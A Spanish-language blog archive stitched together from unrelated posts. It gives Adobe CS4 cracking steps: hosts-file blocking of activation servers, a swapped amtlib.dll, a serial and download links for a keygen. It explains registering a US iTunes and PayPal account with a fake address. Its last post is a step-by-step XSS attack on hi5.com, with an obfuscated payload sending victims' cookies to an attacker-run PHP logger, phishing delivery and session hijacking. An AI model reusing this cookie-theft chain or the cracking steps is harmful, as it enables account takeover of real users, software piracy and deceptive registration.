Siguiendo el consejo de mi amigo Ehectal para conseguir Adobe Master Collection cs4 Pedi mi adobe por internet, me llego en unos cuantos dias, lo instale y todo funciono a la perfección.

El primer problema que tuve fué que el serial me lo marcaba como invalido.

Para resolverlo solo hay que editar el archivo hosts ubicado en:

C:\WINDOWS\system32\drivers\etc

y agregar el siguiente texto hasta abajo

127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 ereg.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 wip3.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 ereg.wip3.adobe.com
127.0.0.1 activate-sea.adobe.com
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 activate-sjc0.adobe.com

Con ello se lograba evitar que el software se actualizara.

Todo funciono perfecto pero un día de pronto me salio el error:

Licencia Caducada
La licencia de este producto ha caducado

Para solucionarlo es necesario remplazar un archivo llamado amtlib.dll en las carpetas de cada uno de de los programas.

Ejemplo copiar el archivo en

C:\Archivos de programa\Adobe\Adobe Dreamweaver CS4

C:\Archivos de programa\Adobe\Adobe Fireworks CS4

Puedes descargar el archivo aquí:

http://rapidshare.com/files/187464091/amtlib.zip

saludos

istore.png

3-Prosigue por aceptar el Contrato de Licencia, y das clic en continuar, enseguida ingresa los datos que te pide la pagina, después de ello da clic en continuar nuevamente.

contrato.png

4-Despues de ello iTunes te pedirá tus datos como si tu fueses una persona residente de Estados Unidos, debido a que no lo eres, puedes usar dos formas, la de pago vía PayPal o pago por tarjeta de crédito, empecemos con la vía PayPal, ve a la Sección Amarilla de Estados Unidos y busca una dirección cualquiera http://www.yellowpages.com/, y será la que ingreses en los datos, anótala en un lugar cualquiera, ya que la necesitaras más adelante

Nota: Puedes usar un nombre cualquiera para identificarte, lo único que importa es la dirección física.

5-Ahora viene lo interesante, en donde dice “Forma de pago” da clic en “No hay”, aun no selecciones la forma de pago vía PayPal, esto será más adelante, después de ello da clic en “Continuar”.

cuentas.png

6-Enhorabuena haz creado tu cuenta iTunes Store desde México.

enhorabuena.png

7-Ahora vamos a la forma de pago vía PayPal, entramos a https://www.paypal.com/, y damos clic en donde dice “Regístrese”

.

inicio-de-sesion.png

8-Donde diga “Seleccione el país o la región en que reside” escoge “Estados Unidos”, y donde diga “Cuenta Personal” da clic en “Comenzar ahora”

.

eua.png

cuentapersonal.png

9-Ahora usaremos los datos usados anteriormente en nuestra cuenta iTunes Store, y crearemos nuestra cuenta, recuerda que tienes que ingresar un email real y propio ya que pedirá una confirmación al momento de crear tu cuenta PayPal.

10-Enhorabuena, haz creado tu cuenta PayPal, pero esta está vacía, ahi es donde entra el papel de http://www.awsurveys.com en la cual nos pagaran por opinar acerca de los sitios web’s que nos den a comentar, esto debido a que cada año millones de empresas pagan por ver que tanto les gustan sus sitios a los usuarios y en eso invierten millones de doláres, esto es una ventaja grande ya que aunque no seas residente de Estados Unidos puedes participar activamente en esta web:.

11-Ahora que tenemos nuestra cuenta donde podemos adquirir dinero, es momento de generarlo y cuando tengamos el suficiente dinero transferirlo a nuestra cuenta PayPal, que previamente habiamos creado.

paypal.gif

12-Es momento de dar el paso final, vamos a nuestro iTunes, y abrimos la iTunes Store, en ella dams clic donde dice “Tu cuenta” abajo de “Enlaces”.

tucuenta.png

13-Dentro de ella damos clic en “Modificar datos de facturación”, dentro de ella seleccionamos “PayPal” y damos clic en “Continuar”.

facturacion.png

paypel.png

14-Después de dar clic nos abrira una ventana donde nos pedirá que nos identifiquemos con nuestra cuenta PayPal, solo es cuestión de ingresar nuestro correo y la contraseña de nuestro PayPal.

identificacion.png

Saludos

Via http://itunesstoremexico.wordpress.com/

Para todos los que acostrumbramos a usar Dreamweaver y no quisimo esperar para instalar el CS4 y tienen el problema de que el trial ya vencio y no acepta ningun serial que le pongamos, aqui les va la solución que encontre para activarlo

  1. Ir a “C:\Archivos de programa\Archivos comunes\Adobe\Adobe PCD\cache” ahi veran un archivo llamado “cache.db”
  2. Borrar el archivo “cache.db”
  3. iniciar el programa y meter el serial yo use: “1192-1413-8739-4724-1366-4303”
  4. Una vez ya introducido el programa dejar que corra el software normal, es decir dejenlo abierto..
  5. veran que de nuevo se ha creado el archivo cache.db (no lo borren ahora)
  6. Ahi lo señalamos y sacamos menu secundario (boton secundario del mouse) y seleccionamos propiedades
  7. Ya una vez le ponemos “solo lectura” y le damos aceptar y listo

Saludos y espero les sirva.

Por si alguien quiere descargar el programa y el keygen:

http://rapidshare.com/files/121489147/ADWCS4.part1.rar
http://rapidshare.com/files/121502120/ADWCS4.part2.rar

http://rapidshare.com/files/121502726/ADWCS4-KEY.rar

Este artículo ya no forma parte de este blog, lo cambie a mi nuevo blog sobre ubuntu junto con todos los que tienen que ver con este tema a un nuevo sitio: http://www.ubuntulatino.com/, el artículo lo puedes encontrar en este link


Los exploits de Mama

octubre 10, 2007

Simplemente excelente

Saludos

Fuente: http://xkcd.com/

De nuevo en wordpress.com

octubre 9, 2007

Hola de nuevo a todos la gente que ha seguido este blog, como quizá se dieron cuenta hace unos meses malamente decidí cambiar de hosting mi blog, por eso del poco espacio que tengo además de las limitantes que da wordpress.com. Después de muchas malas experiencias con el dichoso hosting que escogí como perder mi posición en el buscador además de la extraña caída del servidor por unos 3 meses lo que desapareció el blog un buen rato, decidí volver a mi viejo espacio y pues bueno aquí estamos de nuevo con ganas de seguir escribiendo y con cientos de temas nuevos que poco a poco iré agregando

Además he decidido cambiar un poco los temas de mi blog y abrirme más a los temas relacionados con linux, sobre todo mi favorito, el buen ubuntu y todo lo relacionado con el software libre

Saludos!

Que tal, en este nuevo artículo quiero mostrarles los poderes del XSS(Cross Site Scripting), aplicados en el sitio hi5.com , para evitar hacer de éste articulo algo largo, evitaré muchas explicaciones sobre el tema, solo me concentrare en la idea principal.

Utilizaré el bug publicado en http://www.xssed.com para el sitio de hi5, puedes probarlo solo ingresando a esta dirección:

http://www.hi5.com/friend/displayClassifieds.do?category=item_vehicle&mcategory=
2765733043788180992,2873248617161703&cat_id="><script>alert(document.cookie)</script>

Como podran ver, si entran al link aparece una alerta con la cookie en el sitio de hi5.com, si tienes una sesión iniciada, esta cookie contendrá toda la información de tu sesión.

Bueno primero planeamos el ataque:

  1. El objetivo es guardar la cookie del usuario al que queremos atacar, para ésto necesitamos programar ua página que guarde la cookie en una base de datos, para poder copiarla después
  2. El código javascript como alerta no sirve, necesitamos que redireccione a la victima a nuestro servidor para guardar la cookie que enviaremos por “GET”, es decir el código debe ser algo como: document.location=”http://misitio/robacookie.php?cookie=”+document.cookie
  3. Una vez logrado ésto solo hay que lograr que el usuario se meta al link “malicioso”

Nota: el código javascript se pone después de: http://www.hi5.com/…….73248617161703&cat_id=">...AQUI EL JAVASCRIPT..., para los ejemplos solo parte del javascript

Empezemos….

Primero se programa una página(en mi caso es en php) que reciba la cookie como parámetro, el código sería algo como ésto:

if($_GET['cookie']){
mysql_connect("host","usuario","contraseña");
mysql_select_db("base_de_datos");
$query="INSERT INTO cookies (cookie , hora ) VALUES
('".$_GET['cookie']."','".date("d-m-Y;H:i:s")."')";
mysql_query($query);
header("Location: http://www.hi5.com");

}

Este código es muy simple y hay el que podría ser hackeado sería yo, pero solo quiero poner la idea Analizando el código, primero revisa si se recibe un parametro por medio de GET, si es asi se conecta a la base de datos e inserta el valor que recibe y la fecha para cuestiones prácticas, una vez insertado redirecciona de nuevo a hi5.com, y esto generalmente pasa tan rápido que la victima no nota que cambio por unos momentos de servidor

A continuación hay que hacer el código javascript que redireccione a la página que programamos:
Primer intento:
nota: Recuerdo que el código va al final de la dirección en vez de la alerta como dije antes

<script>document.location=”http://misito.com/robacookie.php?cookie=”+document.cookie</script&gt;

si entramos a la direccón ya con el códgio puesto podemos ver que no sirve ya que no acepta comillas ni comilla simple, para resolver esto hay que enviar la cadena: “http://misito.com/robacookie.php?cookie=&#8221; sin usar comillas, esto se puede hacer con la función javascript String.fromCharCode(), aquí ponemos el valor decimal de cada una de las letras de la cadena separadas por comas, por ejemplo para escribir “XSS” ponemos: String.fromCharCode(88,83,83), que significa lo mismo

Nota, para crear esta cadena fácilmente , en mi sitio tengo una herramienta que la genera automáticamente.

Después de algunos intentos para poner la instrucción y que se ejecute, lo logre de ésta manera que no diría que sea la única ni la mejor pero funciona:

<script>h=String.fromCharCode(**direccion encondeada del servidor que roba cookies ej: http://misito.com/robacookie.php?cookie= **); document.location=h.concat(document.cookie);</script>

Si agregar esto a la dirección con el bug XSS y entrar a ella podrán notar como redirecciona a la dirección que pusieron y guarda tus cookies de hi5.

Listo ya tenemos el link “maligno”, ahora como hacer que la victima entre a ella y no sospeche:

La solución enviar un mail de hi4 como una invitación de un amigo cambiando los links reales por el link maligno, y la victima al hacer click en este link se le pueden robar sus cookies.

Si el usuario guarda su sesión, y entramos  a hi5 y nos “ponemos” sus cookies, entraremos a su cuenta.